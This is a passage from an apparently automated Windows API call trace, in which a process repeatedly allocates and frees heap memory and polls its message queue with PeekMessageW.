hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0130.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0130.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0130.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0130.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0130.242] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0130.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0130.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0130.242] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0130.242] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0130.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0130.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0130.242] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0130.242] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0130.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0130.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0130.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0130.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0130.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0130.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0130.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0130.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0130.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0130.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0130.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0130.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0130.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0130.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0130.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0130.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0130.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0130.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe50 [0130.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0130.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0130.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0130.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.246] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0130.246] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.246] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.246] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0130.246] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.246] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0130.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.246] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0130.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.246] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.246] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0130.246] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.246] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.246] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0130.246] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.246] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0130.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.246] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0130.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.247] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.247] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0130.247] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0130.247] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.247] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0130.247] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.247] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.247] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0130.247] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0130.247] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.247] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0130.247] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.247] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0130.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0130.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0130.248] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0130.248] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0130.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0130.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0130.249] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0130.249] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0130.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0130.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0130.249] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0130.250] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0130.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0130.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0130.250] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0130.250] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0130.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0130.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0130.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0130.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0130.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0130.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0130.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe80 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0130.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0130.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x2f0) returned 0x131e440 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1311208 | out: hHeap=0x12c0000) returned 1 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0130.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0130.252] RtlAllocateHeap 